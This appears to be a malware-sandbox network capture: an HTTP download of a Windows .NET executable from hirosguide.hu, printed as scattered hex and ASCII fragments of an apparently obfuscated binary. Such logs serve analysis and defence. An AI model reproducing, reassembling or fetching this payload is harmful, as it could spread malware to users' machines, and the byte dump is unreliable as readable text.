                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                    Host: hirosguide.hu
                                                    Connection: Keep-Alive
                                                    2023-01-30 12:39:22 UTC0INHTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:39:22 GMT
                                                    Server: Apache
                                                    Last-Modified: Sun, 29 Jan 2023 23:42:33 GMT
                                                    ETag: "1f88309-96600-5f36fa71671d0"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 615936
                                                    Connection: close
                                                    Content-Type: application/x-msdownload
                                                    2023-01-30 12:39:22 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a7 f7 a5 c2 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 58 09 00 00 0a 00 00 00 00 00 00 6e 77 09 00 00 20 00 00 00 80 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELXnw @ `
                                                    2023-01-30 12:39:22 UTC8INData Raw: 21 00 20 75 00 00 00 38 12 22 00 00 fe 0c 2a 00 13 0d 20 d7 00 00 00 38 02 22 00 00 20 e2 00 00 00 20 4b 00 00 00 59 fe 0e 2e 00 20 8b 00 00 00 fe 0e 34 00 38 e1 21 00 00 11 16 1e 62 13 16 20 1c 00 00 00 fe 0e 34 00 38 cd 21 00 00 20 80 00 00 00 20 2f 00 00 00 59 fe 0e 21 00 20 0d 00 00 00 38 b0 21 00 00 20 55 00 00 00 20 40 00 00 00 58 fe 0e 2e 00 20 37 01 00 00 38 9f 21 00 00 11 24 8e 69 1a 5d 13 11 20 b7 00 00 00 38 85 21 00 00 20 dc 00 00 00 20 49 00 00 00 59 fe 0e 2e 00 20 00 00 00 00 fe 0e 34 00 17 3a 6b 21 00 00 fe 0c 1a 00 20 0b 00 00 00 20 78 00 00 00 20 72 00 00 00 58 9c 20 1f 00 00 00 38 48 21 00 00 fe 0c 1a 00 20 06 00 00 00 fe 0c 21 00 9c 20 f7 00 00 00 38 30 21 00 00 fe 0c 1a 00 20 08 00 00 00 20 89 00 00 00 20 2d 00 00 00 59 9c 20 16 01 00
                                                    Data Ascii: ! u8"* 8" KY. 48!b 48! /Y! 8! U @X. 78!$i] 8! IY. 4:k! x rX 8H! ! 80! -Y
                                                    2023-01-30 12:39:22 UTC16INData Raw: 00 20 1c 01 00 00 38 d3 02 00 00 20 67 00 00 00 20 2d 00 00 00 58 fe 0e 2e 00 20 c6 00 00 00 fe 0e 34 00 38 6d 16 00 00 3a ad 02 00 00 fe 0c 1a 00 20 01 00 00 00 fe 0c 21 00 9c 20 0f 01 00 00 38 91 02 00 00 20 64 00 00 00 20 43 00 00 00 58 fe 0e 2e 00 20 0b 01 00 00 38 80 02 00 00 20 c4 00 00 00 20 14 00 00 00 58 fe 0e 2e 00 20 07 01 00 00 fe 0e 34 00 38 5f 02 00 00 fe 0c 2a 00 20 11 00 00 00 fe 0c 2e 00 9c 20 da 00 00 00 fe 0e 34 00 38 08 16 00 00 39 cb e5 ff ff 38 39 02 00 00 fe 0c 1a 00 20 05 00 00 00 20 1b 00 00 00 20 23 00 00 00 58 9c 20 0b 00 00 00 38 1e 02 00 00 11 2d 1f 0f 11 2f 1d 91 9c 20 79 00 00 00 38 0b 02 00 00 fe 0c 2a 00 20 05 00 00 00 fe 0c 2e 00 9c 20 68 01 00 00 fe 0e 34 00 16 39 ea 01 00 00 20 82 00 00 00 20 74 00 00 00 58 fe 0e 2e 00
                                                    Data Ascii: 8 g -X. 48m: ! 8 d CX. 8 X. 48_* . 48989 #X 8-/ y8* . h49 tX.
                                                    2023-01-30 12:39:22 UTC23INData Raw: 00 fe 09 01 00 6f 63 00 00 0a 2a 00 4e 2b 02 26 16 00 fe 09 00 00 fe 09 01 00 28 2f 00 00 0a 2a 3e 2b 02 26 16 00 fe 09 00 00 28 5f 00 00 06 2a 2e 2b 02 26 16 00 28 5d 00 00 06 2a 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 6f 51 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 6f 52 00 00 0a 2a 00 6a 2b 02 26 16 fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 6f 54 00 00 0a 2a 00 3a 2b 02 26 16 fe 09 00 00 6f 55 00 00 0a 2a 00 3a 2b 02 26 16 fe 09 00 00 6f 56 00 00 0a 2a 00 3e 2b 02 26 16 00 fe 09 00 00 28 64 00 00 0a 2a 2e 2b 02 26 16 00 28 a4 00 00 06 2a 3a 2b 02 26 16 fe 09 00 00 28 11 00 00 0a 2a 00 16 2b 02 26 16 2a 00 00 3e 2b 02 26 16 2b 02 26 16 02 28 a7 00 00 06 2a 26 2b 02 26 16 2b 02 26 16 2a 00 00 3a 2b 02 26 16 fe 09 00 00 28 11 00 00 0a 2a
                                                    Data Ascii: oc*N+&(/*>+&(_*.+&(]*J+&oQ*J+&oR*j+&oT*:+&oU*:+&oV*>+&(d*.+&(*:+&(*+&*>+&+&(*&+&+&*:+&(*
                                                    2023-01-30 12:39:22 UTC31INData Raw: 6b 5a 75 41 6c 44 78 75 6a 78 39 46 46 42 79 55 67 54 00 66 69 65 31 50 79 67 46 57 43 6d 51 67 5a 58 71 74 43 00 53 41 50 50 65 77 42 6f 43 67 75 72 6e 71 59 50 48 46 00 6e 5a 73 35 6b 39 6f 50 57 75 5a 74 43 44 46 30 46 74 00 41 74 74 72 69 62 75 74 65 00 4c 36 70 35 70 41 76 51 50 4b 65 50 6c 4f 46 73 6e 62 60 31 00 75 58 5a 4c 4e 63 74 65 79 30 56 35 65 4c 35 4f 33 4f 00 6d 52 6d 71 59 56 56 5a 75 62 48 54 4a 5a 46 44 6a 4c 00 44 36 51 64 42 43 6e 42 74 75 64 64 6e 51 31 6b 45 37 00 6a 46 61 63 4a 72 37 34 48 72 65 6d 77 33 38 6f 67 5a 00 57 51 6e 78 6f 71 54 6a 43 79 78 72 6f 65 77 61 4f 4e 00 45 6e 75 6d 00 6d 41 76 55 32 6e 66 43 79 4f 78 43 42 46 4f 33 73 43 00 51 57 50 35 79 49 4a 44 72 65 65 55 68 77 56 68 79 6e 00 3c 50 72 69 76 61 74 65 49 6d
                                                    Data Ascii: kZuAlDxujx9FFByUgTfie1PygFWCmQgZXqtCSAPPewBoCgurnqYPHFnZs5k9oPWuZtCDF0FtAttributeL6p5pAvQPKePlOFsnb`1uXZLNctey0V5eL5O3OmRmqYVVZubHTJZFDjLD6QdBCnBtuddnQ1kE7jFacJr74Hremw38ogZWQnxoqTjCyxroewaONEnummAvU2nfCyOxCBFO3sCQWP5yIJDreeUhwVhyn<PrivateIm
                                                    2023-01-30 12:39:22 UTC39INData Raw: 1c 1c 1c 06 20 01 12 81 29 0e 05 20 00 12 81 29 05 00 02 01 1c 0a 04 20 01 01 0a 04 00 01 0a 1c 05 20 01 1d 05 08 06 00 01 01 12 80 a5 03 00 00 1c 07 00 02 01 1c 11 81 55 06 20 01 01 11 81 55 06 00 03 1c 1c 1c 1c 09 20 02 12 81 19 1d 05 1d 05 07 00 04 01 1c 1c 08 08 05 00 02 08 1c 08 07 00 04 1c 1c 1c 08 08 13 07 07 1d 05 1d 05 1d 05 1d 05 12 81 21 12 80 f9 12 81 25 05 20 01 1d 05 0e 07 00 02 01 1c 11 80 e9 05 00 02 01 1c 1c 05 00 01 0e 1d 05 01 08 0a 20 06 09 18 18 18 09 18 10 09 10 20 08 12 80 bd 18 18 18 09 18 10 09 12 80 c1 1c 08 20 02 09 10 09 12 80 bd 03 20 00 18 09 20 02 12 80 bd 12 80 c1 1c 06 20 01 18 12 80 bd 03 06 11 7c 04 06 11 80 80 04 06 11 80 84 04 06 11 80 88 04 06 11 80 8c 04 06 11 80 90 04 06 11 80 94 40 01 00 33 53 79 73 74 65 6d 2e 52
                                                    Data Ascii: ) ) U U !% |@3System.R
                                                    2023-01-30 12:39:22 UTC47INData Raw: 2d 60 5f 93 40 23 f7 06 43 25 a9 97 90 1b a5 89 91 11 b7 d3 49 3b 32 0b 24 06 76 b7 4d f4 71 5a 97 a7 73 45 d2 41 21 09 a1 15 ab 93 f1 1a 6b 8f ee 1b 4e cc 26 9c b2 b2 f6 24 f1 79 db d0 c8 b6 57 24 5a 80 27 30 09 ff 85 0f 21 c5 c8 1c f3 a0 78 7b b7 06 59 cc 1f 0e 35 0a b5 4c dd 2d a3 da 10 45 b2 af 43 3e 12 eb 19 a7 f2 aa bd a2 35 21 a9 f8 a1 8e be 3f 20 67 5d 12 8c d5 41 c5 f3 f8 a8 e2 ef 5b fa ed 7e c8 8b bb 0d cc 53 10 8c 00 52 c4 ef 0f 8d 4f 6f 6f 6d bd e2 c3 f2 dc 91 e8 d3 97 18 ea e4 41 16 1e 4b 70 10 08 dc 19 a5 77 59 80 68 7c b9 c6 38 2d 71 e0 b8 69 17 bc 5c 32 45 d0 f8 6f 33 8c cf f2 86 e8 3a 12 21 f4 72 7d 32 97 bc 08 17 fe 81 29 6c b7 65 a7 65 12 91 25 c7 5a af 57 68 0f c7 87 6c 0d 6f 19 b7 37 f0 f4 d4 c6 ff 2c 05 40 87 d3 69 31 e0 64 b8 c5 3d
                                                    Data Ascii: -`_@#C%I;2$vMqZsEA!kN&$yW$Z'0!x{Y5L-EC>5!? g]A[~SROoomAKpwYh|8-qi\2Eo3:!r}2)lee%ZWhlo7,@i1d=
                                                    2023-01-30 12:39:22 UTC55INData Raw: ff 66 ec f3 1e 54 d3 ca b2 d8 7b 02 98 10 db 13 74 ac 01 41 1c a1 ae 16 a0 52 31 5b ef 46 38 89 d7 ba cd 94 79 c6 6e 2d 93 ef 27 2f 88 85 44 f5 91 3b f9 d1 c2 f5 70 f8 15 ef 05 4b 05 e8 49 d0 4b 97 84 6f 12 97 5d d5 4b c5 fb 59 ea 1f b9 a5 a7 de ae 6c 7d e7 16 fa 36 e2 d6 0d 5e b1 0c d9 ed 1a 40 ed e8 b2 55 3a a3 4b b6 54 4f 85 38 c8 c3 95 bb 4e a7 3a 65 20 7a 4f 92 81 b4 a1 bd 64 65 14 81 25 27 4f 17 bc 92 eb e5 b4 c7 66 a0 a9 9f 9c 88 b0 89 2c bc ad f3 22 de 03 19 d7 fb 81 bc 24 49 f2 0f b9 7a b5 7d 22 4a a8 e9 b7 2f 97 ec da c7 eb 09 85 ff 38 45 f6 ef 62 c0 07 fd d2 a5 a5 33 ea 5e 3a bf 43 ac 03 02 f0 d5 69 a7 a5 50 e4 b5 bf a6 6a cd 54 f4 ec cc 1b 81 87 f4 d9 91 02 25 78 95 3c f2 3b a1 92 c4 e7 46 b7 19 33 7f 84 9f 4e a5 dc 73 e2 e7 1d 3c 9e f1 3f f3
                                                    Data Ascii: fT{tAR1[F8yn-'/D;pKIKo]KYl}6^@U:KTO8N:e zOde%'Of,"$Iz}"J/8Eb3^:CiPjT%x<;F3Ns<?
                                                    2023-01-30 12:39:22 UTC63INData Raw: aa d7 82 43 15 47 59 7b 9f 33 28 f1 59 ab 10 5d b5 c2 94 08 3d 4d 1a 37 02 1f 1c 92 88 75 f6 5e e5 01 5d 16 51 41 6b bb 3d 83 8b bd 4d 38 a4 a0 cd e6 3a a1 34 bf 50 ba 61 b8 32 66 3e 79 5b 94 69 0f b5 35 33 fa e0 ad 4c 8d 97 9d 96 4b 90 0b 33 13 31 f9 e7 d8 5e 31 8b 67 17 3d 4d 35 f8 b8 f8 47 f5 14 57 88 77 1b 03 8b 86 e5 77 2c 52 a1 61 1f 12 0e 2a 5a 76 1f 62 34 97 2d 6e bc cd 0b f7 30 59 22 bc 95 df f2 e3 9a 56 ee 5d 7c d3 63 aa 04 ed 2b 63 db 6f 32 67 2d b7 5a d7 14 36 1b b9 7c 1e d2 5b b0 ac 4f 21 d5 d9 0e 4b 35 6b ed f0 e5 bf 3e b5 0e 1d 6c c0 14 89 21 ef be 55 4c d1 07 e5 af c8 99 df 9f cc 9c ec bc 87 ce 4b 49 6f bf 00 b3 83 a5 e7 49 85 4b 9c 63 81 91 78 11 01 be 16 9b d9 d4 28 7c f3 ea 8b 18 ab b6 52 57 e1 25 cd 5c cc 53 55 02 bd 13 6f af c5 41 f2
                                                    Data Ascii: CGY{3(Y]=M7u^]QAk=M8:4Pa2f>y[i53LK31^1g=M5GWww,Ra*Zvb4-n0Y"V]|c+co2g-Z6|[O!K5k>l!ULKIoIKcx(|RW%\SUoA
                                                    2023-01-30 12:39:22 UTC70INData Raw: a0 94 05 9f f4 b5 f4 b9 ae d2 f0 61 7c 68 c8 96 17 b7 d4 b7 62 e5 20 0b 55 4e f0 f6 ef 1b 9b a0 75 9c 58 65 f6 25 d6 04 5d f7 e7 ef 2d e1 75 d2 6f f8 49 ce ed 1d 92 e5 d7 f0 13 95 bd d4 f3 ac df d5 ec 6d c8 98 86 b4 4a d1 56 35 80 15 31 6d bf 72 63 5e f2 c6 77 19 46 1c 71 b2 56 f3 a9 19 7d 53 7c 5e d0 66 e2 6f 96 11 21 67 70 1a d0 b7 d6 21 27 33 46 7d c5 f5 3d cf 23 10 b7 39 6b 7a c1 cd 9d fb b3 de 61 50 8b c4 6d dc ad 27 f9 08 f6 ba 4a 03 22 a4 b8 be d7 17 e5 dd 70 b2 97 c0 7b 49 fc 8b 61 2f d2 3e b5 39 0e 17 5e fe 28 c2 96 c0 fb 39 a2 03 2d 3e cf 81 6d 11 c5 da 9c 59 7e 35 45 91 bd 1e 80 b8 69 7d c2 b8 29 4d 48 f3 30 c3 78 6b 99 0a 07 2c 0d 2e 40 96 29 ec 84 35 73 7f d6 3e 5a b2 8c 60 29 9d 9c 18 3d 7e 04 48 37 c0 01 af be c6 28 a8 f1 01 fd a2 71 91 7d
                                                    Data Ascii: a|hb UNuXe%]-uoImJV51mrc^wFqV}S|^fo!gp!'3F}=#9kzaPm'J"p{Ia/>9^(9->mY~5Ei})MH0xk,.@)5s>Z`)=~H7(q}
                                                    2023-01-30 12:39:22 UTC78INData Raw: aa 8b ca ec ab fc 6f 34 62 f2 5b d2 8b 26 f9 61 92 0a 57 88 65 34 8b 2c b5 2c b5 b4 10 b8 18 35 ba 22 35 97 7d 6f b1 da 84 fd 6b c8 73 70 67 29 92 33 93 66 33 f7 90 b1 a9 15 b7 11 50 c8 fe f8 04 90 6a 2a c8 04 75 9f 4a 4c c0 9c 62 8e d8 b7 09 fa 9e 9c ee dd 45 47 81 26 4c 2e 7a 13 86 2e f6 03 02 f1 85 d6 fc 7c 3f 55 e4 65 bc c7 43 00 0d d8 08 b9 f2 dc 5b e7 17 ce fe b9 8f 28 23 ef 73 30 ef d0 b6 43 e9 ca e7 36 a9 54 c1 df cf da 51 aa c6 4d 2c ac 86 db 1e ec 14 09 e7 08 2a 0f 4b b2 8f 4b 87 88 97 2e 65 51 b9 c6 8d a2 f1 26 24 16 a6 2f 9b 17 88 94 41 27 05 5b ae 1c 5c 5c 54 40 03 b2 ba 6d c6 6a ba 23 22 e6 f1 2a 31 4b 6c 62 45 9a 32 28 71 f6 ef bb 88 e0 7a 0f c2 bb db f1 90 c5 c4 18 8f 3c 38 bc 85 71 e3 50 c9 c4 da 7a 0f e5 e6 98 37 29 0f 07 e8 ff 3b 6e 15
                                                    Data Ascii: o4b[&aWe4,,5"5}okspg)3f3Pj*uJLbEG&L.z.|?UeC[(#s0C6TQM,*KK.eQ&$/A'[\\T@mj#"*1KlbE2(qz<8qPz7);n
                                                    2023-01-30 12:39:22 UTC86INData Raw: 91 1b b0 9e 8c e0 d1 d8 dc 33 20 f8 2a 6c 04 55 23 d3 a1 9f da da 1c 85 e0 23 aa a9 21 73 55 4f 30 a3 f0 c5 6b 47 2f 88 99 2d 40 57 15 49 97 57 2f 9c 86 2e e1 5b e3 5a e8 96 06 b5 53 ed 11 ba a0 df 04 e7 0b d3 0f 26 14 db 40 bb 05 ad 70 09 90 5f 98 78 a7 4b 4f 9e 11 4b ed 14 f4 bd 97 80 81 7e 4e 3a d7 66 70 02 43 6d cf 81 d8 77 23 21 35 43 07 8c 6e 6e 11 7b 92 4f 5f 52 54 65 c6 ce 85 97 25 ac 09 b0 0e 65 a3 2f cf de ca 2b c2 c2 c3 39 bd 04 91 be ff 69 7f bf 09 31 6a e3 77 7e 1f 1b eb 73 70 9f da b6 ea f6 5f 07 3e da 64 40 17 76 62 0e 80 83 a9 2e 69 92 81 a3 94 6c f6 76 33 bb 06 ee 69 c5 2f 98 7a 8e 10 55 d9 4c 74 17 0d 5f 33 be fc 57 71 9e 42 11 fc bc 32 7a ee cb 12 1a c2 03 56 ed dc 1b e9 c9 dd 9e d8 c4 0f 49 1a 74 e7 f6 21 7b bb 64 8f 69 4c 9d 94 5a 61
                                                    Data Ascii: 3 *lU##!sUO0kG/-@WIW/.[ZS&@p_xKOK~N:fpCmw#!5Cnn{O_RTe%e/+9i1jw~sp_>d@vb.ilv3i/zULt_3WqB2zVIt!{diLZa
                                                    2023-01-30 12:39:22 UTC94INData Raw: be ae 7f b8 ba 6c 65 2d ec 3b ac f2 0c 53 19 e8 ef d0 cb bd 7a 9a 2d 0f 21 02 e8 ea 68 15 42 77 e6 b7 18 e7 8d a4 c4 57 08 af 7b 66 8c 92 78 c0 8f 62 34 dc 76 06 1d ee bb 01 10 86 c4 b7 4a 8a b4 7f 88 72 bf cf 4a ed c9 3c dc e3 0c 4a 7f 98 10 3f 91 5e 53 3b e9 cb 26 ac ad 88 c1 7d d3 95 b8 20 ce f9 d2 85 6b be 0c 9a e5 d8 b6 cb 1c 72 9a 64 cb 63 cc e3 ea bb 3c 78 01 d0 ff 61 f7 9b 09 5a 8c dc 60 16 b3 8a bf 08 af 9c 70 87 60 9c cd 61 85 b5 c2 59 98 64 09 a9 b6 c9 2c 02 2e 70 2b b6 e2 a1 9c d2 ef d2 eb ce 9d 78 e4 7a 19 76 35 0c 59 4c 9c f4 18 bb 0d 30 ad 80 5b df ee 5a ab 78 1f 20 fe 35 3b ce e6 a4 00 20 0b fe 94 94 f3 e4 00 7c 94 e9 c9 29 25 20 ed 78 34 43 30 a8 99 5c 0d 6d 9b c4 4b bc 41 21 d5 b0 1f 5f 93 75 9c 96 17 d3 a4 21 ad 5e 5b 79 e1 8e 45 d1 32
                                                    Data Ascii: le-;Sz-!hBwW{fxb4vJrJ<J?^S;&} krdc<xaZ`p`aYd,.p+xzv5YL0[Zx 5; |)% x4C0\mKA!_u!^[yE2
                                                    2023-01-30 12:39:22 UTC102INData Raw: 6b 09 44 1d 63 a0 a7 82 67 39 17 89 13 16 0f 1a 74 b8 e1 b7 03 58 ce 4a e9 d5 55 93 20 04 16 2f 43 db 79 80 34 55 79 b8 b7 ba 16 ec 15 b9 17 67 0b 04 0b 32 4f 84 c4 9c 7b 24 0e 3a f5 82 da af c0 e6 2a 93 34 9f 1d 66 2d e2 6b 91 e3 48 b0 b8 be c6 fd a9 2d 33 54 be 0d 65 d3 0d a3 09 d8 b0 b6 2f 79 2d 9a b1 d1 a4 8f fb 4e 20 e8 a9 91 dd c0 24 d0 fc b9 a2 c8 4e 6a 27 99 12 dd 25 96 7f 8b b6 24 6f 93 12 7a 82 c0 e4 01 58 50 0c 5a 51 c2 70 a0 39 1e 65 d1 81 4a d1 5b fa 39 d6 5b 1f a1 6c 74 81 f3 de 60 42 24 1c e0 59 13 7f 0a d6 86 74 c9 3e 47 fd 98 86 a5 72 83 69 56 a0 5e 6a 07 b4 b0 c8 70 63 fb be d1 10 f3 84 26 fc e2 5b 2f 61 e5 fd 45 4e 3f d4 ef 07 09 04 b9 31 06 79 70 01 3b e7 83 06 33 21 8b a3 1e c8 58 de 6f 4e e3 a8 1b a9 b2 1a 29 0f 02 69 ad a1 73 5a af
                                                    Data Ascii: kDcg9tXJU /Cy4Uyg2O{$:*4f-kH-3Te/y-N $Nj'%$ozXPZQp9eJ[9[lt`B$Yt>GriV^jpc&[/aEN?1yp;3!XoN)isZ
                                                    2023-01-30 12:39:22 UTC109INData Raw: 40 ef 0a 5b ff 44 06 21 d4 3c b7 73 62 46 a6 18 bb 51 0a 22 27 cf 08 74 14 1f c6 33 45 81 56 58 7d 5e 8a ef ea df b5 71 41 1c d4 14 bf dc 12 f5 2f f6 cd 1c fb 42 0b dc 88 1e 02 5c c4 a7 f7 a8 0d 23 bd ac 40 38 1e a3 2c a2 e9 6f 61 16 82 db b6 30 64 ed 70 a0 1d de 78 ef eb 16 1a 11 23 b5 e7 03 23 0b d4 af 7d f1 40 d9 f0 77 fa b4 94 25 04 21 f3 1c 90 2d 04 d6 e7 ce 51 7b b5 23 b9 fa 8a b4 1c 3d 58 9a 5d 28 74 4f 3e 67 fa 75 95 a4 de 90 41 03 32 00 d9 fb ae 1a 5c b4 29 44 e3 a5 dc 7f 1c da a2 1a 8b 1b ad 8f 61 61 fa 85 70 74 70 2c 7d 65 43 16 d1 1d 98 38 b2 7c 07 1d 65 25 21 3e ee 3a 15 96 bd 0f 03 ac 8c 5d 41 90 3f 64 55 33 17 49 b6 56 bd c7 61 80 af 2c 56 d2 e9 4f 4a 69 65 49 74 35 57 b4 dc c5 4e ba d1 32 b8 43 c5 a8 49 3d af 18 17 c6 30 4b 96 30 5b ca 9d
                                                    Data Ascii: @[D!<sbFQ"'t3EVX}^qA/B\#@8,oa0dpx##}@w%!-Q{#=X](tO>guA2\)Daaptp,}eC8|e%!>:]A?dU3IVa,VOJieIt5WN2CI=0K0[
                                                    2023-01-30 12:39:22 UTC117INData Raw: 69 90 cd b3 b4 4c b8 46 97 de 05 10 d2 66 1f 68 6f 51 ad 77 83 30 db 6d d5 e7 d0 58 ad f2 d2 ca fb 72 2c d0 71 dd a4 58 97 34 a5 d7 6c e2 fa c0 de 9b 0c d7 28 3b 55 94 3c 60 99 fd cc 00 a6 fa 44 0a b6 5f cf 2b 06 24 6a 86 3a cf 31 0e dc e1 3d e4 36 a3 fd 04 5b f4 4c c6 2c a7 e5 d6 78 44 52 48 24 f9 ac be 03 0c 26 36 88 07 2e fd 74 7d de 85 f5 fe 8c 34 91 eb a9 03 b1 0d a4 e5 29 2a bd dc 46 f4 6c a0 95 0d 14 f4 42 07 8f f7 b2 b1 07 31 07 24 ac fa ff 1f fa a6 20 e8 94 dc 0d 5e 62 68 b8 e4 96 2f 69 55 4f 7c 8c 24 95 6f bd d5 69 c4 fe 09 b3 f8 57 3b 14 b7 0b b2 a0 b1 4a fd da 8d 2b b4 2c 07 40 02 68 db a2 d0 5d c8 d7 a8 53 78 d5 ae f9 f5 ff 1f 26 72 92 a8 7d b2 de 47 04 80 ac a0 2d b4 1d 8b 66 a6 f8 32 91 71 64 66 fa ea 7d 74 48 f4 48 53 96 0b 97 fb 73 35 1b
                                                    Data Ascii: iLFfhoQw0mXr,qX4l(;U<`D_+$j:1=6[L,xDRH$&6.t}4)*FlB1$ ^bh/iUO|$oiW;J+,@h]Sx&r}G-f2qdf}tHHSs5
                                                    2023-01-30 12:39:22 UTC125INData Raw: a9 91 57 a1 97 f6 c2 33 32 62 e3 43 51 55 f8 f4 56 c3 21 3a aa 52 50 3b 23 2c c1 1f 60 94 4e 67 5d 8f 35 ef 85 f7 df db 50 1a 71 e7 f1 8f dc da f8 e1 2f 26 02 1a e3 31 68 57 b9 5d 21 0f fa 32 03 2c b6 c7 1f b1 69 3e a2 96 ab b4 7c ae d3 ae f1 58 ba 35 33 71 d2 79 b0 87 a2 14 b1 86 b6 5e 2a 4e 11 db 07 df 6c 35 f5 19 8f be 58 31 c7 56 a4 73 c4 2a e3 6b 98 09 34 03 ea 53 e7 60 26 18 54 7a 38 9c a7 3a be 2e 73 10 98 1a f8 36 41 09 10 50 d0 3d c4 7b 23 22 cb b6 15 e9 d3 f6 01 36 41 9e ea 17 d9 72 7a c7 f2 30 13 15 27 ed f5 cb da f3 c0 94 4f 91 f3 c0 a4 84 b1 bc c5 fd 3e f7 e6 81 a9 b7 84 6c 86 f7 c9 17 68 bb 4f c1 fb 10 48 73 fd fd b5 34 30 f8 d0 bd c9 35 1b 30 d0 cd 24 4f ed 8b 75 1b f4 15 f8 5b 31 83 53 1f 78 98 aa 8c c4 24 b8 5b 9b 74 6d d9 a2 05 24 bb a0
                                                    Data Ascii: W32bCQUV!:RP;#,`Ng]5Pq/&1hW]!2,i>|X53qy^*Nl5X1Vs*k4S`&Tz8:.s6AP={#"6Arz0'O>lhOHs4050$Ou[1Sx$[tm$
                                                    2023-01-30 12:39:22 UTC133INData Raw: b5 85 38 a8 6e 01 3d f8 b3 6c ed f1 a2 70 14 b8 e6 8e 91 b5 70 17 af ee 89 42 f3 39 84 13 0c 1e 8d fb 47 9a 2b 39 76 0d bd 67 69 b7 64 cf 94 00 7d be 7c 35 cc a2 13 d2 3f 9a 7d 1c 5b 1d a1 9e 62 33 db fa d8 96 44 21 9d b3 47 6a eb 52 0c 6a 05 37 df df f0 dd 0d 37 72 a8 ed fd b5 40 d1 f3 10 88 7d 89 23 86 c3 7d c9 20 4e 08 94 60 8d c4 50 57 92 2b 44 5b 40 44 19 18 93 90 91 1d 63 b0 c7 b0 a4 0a 0d 0a 3e 7e 35 fb f0 59 69 c1 88 32 60 39 20 e8 bb e4 8d 35 30 44 ed 0c 99 e2 20 01 7e 1c 5f d3 b4 6c 6c 59 d2 86 02 ee da 12 b9 6f c9 8d d2 07 ef 70 45 1e cb b0 a0 17 e5 6c 02 09 81 84 ae 10 c0 a6 9e 72 5b 14 4d 8c 6d 6c 15 23 6f 74 aa 70 ff 3e 89 97 c7 57 e0 23 e3 78 ce b1 8a 4f d4 0c 09 42 7f 42 99 f4 3c 53 88 a7 a6 1b b9 33 f2 58 b1 61 fa d2 02 1a a1 85 ee 51 41
                                                    Data Ascii: 8n=lppB9G+9vgid}|5?}[b3D!GjRj77r@}#} N`PW+D[@Dc>~5Yi2`9 50D ~_llYopElr[Mml#otp>W#xOBB<S3XaQA
                                                    2023-01-30 12:39:22 UTC141INData Raw: c8 3d 86 fc ea c4 54 b0 51 1c a0 63 8e 8d 19 c0 37 e6 28 dc 49 7a d5 f2 2a e7 0a a4 b9 7e cd 0c f5 63 d0 17 c7 b3 0b 1d bf e7 10 b6 58 88 f6 90 53 6d a7 63 e9 d1 fe 2e 4d 4d a8 60 e2 39 2c 6f 79 8e db 26 13 d4 cd f5 82 22 47 d5 7a 9c 29 93 30 42 0b d7 7e a4 79 6c 3f a2 92 c8 3b f4 6e a7 2a 3a e9 95 ac f9 be fc 96 81 67 7c d6 7b 75 93 af 9f 30 76 e8 e8 54 29 d6 97 9c a8 4b 0e 4c 08 9d b8 44 72 cc fd 82 1d e9 f4 77 95 3f 3c 2e e8 ec 57 78 4e ae d0 75 fb 4f 68 38 04 16 bb df 7e 1c 62 77 c5 1a 55 c5 5f 28 13 73 70 50 6c 88 a7 ee b4 8e 4a 2e 63 63 14 7f 88 bf 2d dd 7a de 84 1d 15 f6 b5 7a 09 0e 7b 21 ef 6e f0 d3 67 2e d6 31 1a c7 60 f4 cb 08 e0 21 58 0d b8 db de 81 0c 1b 34 09 d3 0f c0 2a f1 65 ee c4 8b 1c d5 a3 3b 08 5f c7 5d f1 c1 25 11 09 9d 0e 3d d9 a3 9b
                                                    Data Ascii: =TQc7(Iz*~cXSmc.MM`9,oy&"Gz)0B~yl?;n*:g|{u0vT)KLDrw?<.WxNuOh8~bwU_(spPlJ.cc-zz{!ng.1`!X4*e;_]%=
                                                    2023-01-30 12:39:22 UTC148INData Raw: fa 68 37 7c 8f 22 9f 92 02 ae c5 c1 4f 76 d0 2a 35 f2 a1 51 f1 54 49 50 c7 78 80 e6 79 6f d4 c0 77 cf 76 0d f3 bc d6 07 a9 7c 9f ad 7d cb 01 54 47 a6 66 fa 9c 3d ef a2 cf 25 4f 1d 7e 89 b7 84 71 7a 6e e5 91 78 fe 74 18 ed 5f 1e 89 b6 d7 fa 41 b9 77 16 eb 58 4a 26 f5 f7 a2 fe b9 76 23 8b 69 cd ef ea 46 41 0c 9a 15 cb 67 aa fb 97 98 fd cc ab b7 ec 15 cc 14 ba d6 9e 3a 1a 9b 9d c8 56 9b b6 74 c3 d9 7f 55 cc 38 08 63 d0 4a 44 3b 9a 51 d7 88 44 6a 55 36 70 e0 db 5b 0a 61 dd 93 59 e2 dd 8b cf d1 0b e8 2a 5e c3 e6 19 58 e9 80 7c 81 71 8d b1 89 d1 ec e9 f2 cf 8f 95 86 f4 d3 2d 45 8a ee 29 a9 6b 18 e6 f7 94 fa ab 2a 3a 88 ef d6 2e 74 39 c8 d4 22 12 c3 f5 ef a3 63 8e b8 05 02 9f 42 7f eb 54 91 d0 4d 1b b8 e1 33 62 f2 fc fd 1e 71 5b 01 a9 d6 40 18 72 c8 49 18 6e ae
